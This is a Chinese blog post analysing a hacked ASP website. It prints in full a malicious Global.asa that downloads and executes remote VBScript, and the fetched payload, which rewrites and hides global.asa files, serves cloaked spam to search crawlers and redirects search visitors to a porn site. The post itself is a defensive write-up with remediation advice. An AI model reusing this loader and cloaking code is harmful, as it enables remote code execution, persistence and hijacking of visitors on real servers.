• 不是一句话的事,asp引擎容易被黑


    最近,有个别用户反映网站直接从浏览器打开正常,但从百度或者google等搜索引擎搜索结果点击打开后会跳转到色情网站。

    分析:

    1,该问题都发生在 asp网站

    2,网站访问量较大

    3,网站首页等程序文件并未有篡改迹象

    4,发现根目录下有Global.asa 文件(罪魁祸首)

    打开Global.asa 查看代码如下:


    <script language="vbscript" runat="server">




















    'by*diao
    'by*aming
    sub Application_OnStart
    end sub

    sub Application_OnEnd
    end sub

    sub Session_OnStart
    url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    GetHtml = objStream.ReadText
    objStream.Close
    if instr(GetHtml,"by*aming")>0 then
    execute GetHtml
    end if
    end sub

    'sub Session_OnEnd
    'end sub
    </script>

    因为Global.asa文件为网站启动文件,当一个网站被第一次访问时,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问,从 http://www.tayequ.com/txt/globals.txt 处下载内容,并执行,让我们来看看 http://www.tayequ.com/txt/globals.txt 的内容是什么吧:


    '<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
    '<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
    'by*aming
    'Server.ScriptTimeout=600
    Public Function createasa(ByVal Content)
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
    f.Attributes=0
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    Obj.writetext = Content
    Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
    Obj.Close
    Set Obj = Nothing
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing
    End Function

    Public Function createasax(ByVal Content)
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
    f.Attributes=0
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    Obj.writetext = Content
    Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
    Obj.Close
    Set Obj = Nothing
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing
    End Function

    Public Function GetHtml(url)
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    GetHtml = objStream.ReadText
    objStream.Close
    End Function

    Function check(user_agent)
    allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
    check_agent=false
    For agenti=lbound(allow_agent) to ubound(allow_agent)
    If instr(user_agent,allow_agent(agenti))>0 then
    check_agent=true
    exit for
    end if
    Next
    check=check_agent
    End function

    Function CheckRobot()
    CheckRobot = False
    Dim Botlist,i,Repls
    Repls = request.ServerVariables("http_user_agent")
    Krobotlist = "Baiduspider|Googlebot"
    Botlist = Split(Krobotlist,"|")
    For i = 0 To Ubound(Botlist)
    If InStr(Repls,Botlist(i)) > 0 Then
    CheckRobot = True
    Exit For
    End If
    Next
    If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
    If Session("ThisCheckRobot") = 1 Then CheckRobot = True
    End Function
    Function CheckRefresh()
    CheckRefresh = False
    Dim Botlist,i,Repls
    Krobotlist = "baidu|google.cn/search?|sogou.com/web?query=|soso.com/q?w="
    Botlist = Split(Krobotlist,"|")
    For i = 0 To Ubound(Botlist)
    If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
    CheckRefresh = True
    Exit For
    End If
    Next
    End Function
    Sub sleep()
    If response.IsClientConnected=true then
    Response.Flush
    else
    response.end
    end if
    End Sub


    If CheckRefresh=true Then
    If check(user_agent)=false Then
    cnnbd=lcase(request.servervariables("HTTP_HOST"))
    response.redirect("http://www.hencao.com/hh.html?html"&cnnbd&"")
    response.end
    end If
    end if
    user_agent=Request.ServerVariables("HTTP_USER_AGENT")
    if check(user_agent)=true then
    body=GetHtml("http://98.126.137.155:28/?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
    response.write body
    'response.end
    else

    asa=GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t")
    'if instr(asa,"by*diao")>0 then
    ' createasa(asa)
    'end if
    ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
    namepath=Server.MapPath(ScriptAddress)
    If Len(Request.QueryString) > 0 Then
    ScriptAddress = ScriptAddress & "?" & Request.QueryString
    end if
    geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
    geturl =LCase(geturl)

    Call sleep()
    'end if
    end if
    '</body></html>


    块代码的作用就是判断访问页面是否来自于搜索引擎,是的话,就将HTML:"http://www.hencao.com/hh.html?html 输入给浏览器。也就是打开网站后跳转的色情网站地址。


    5,解决方法:

    解决方法很简单 那就是删除 Global.asa 文件,最主要的还是要检查一下程序的安全问题,多出这个文件不是偶然,99% 是程序有漏洞,被利用后上传了该文件。

    感谢:jude_liu 

  • 相关阅读:
    spring源码解析-ApplicationContext解析
    分布式系统的CAP理论
    Java常用设计模式详解1--单例模式
    mysql全方位知识大盘点
    重磅!微软发布 Visual Studio Online:Web 版 VS Code + 云开发环境
    知否知否,VS Code 不止开源
    webpack静态资源拷贝插件
    webpack 清理旧打包资源插件
    webpack 配置分离css插件
    webpack打包指定HTML的文件并引入指定的chunks
  • 原文地址:https://www.cnblogs.com/xred/p/2307732.html
Copyright © 2020-2023  润新知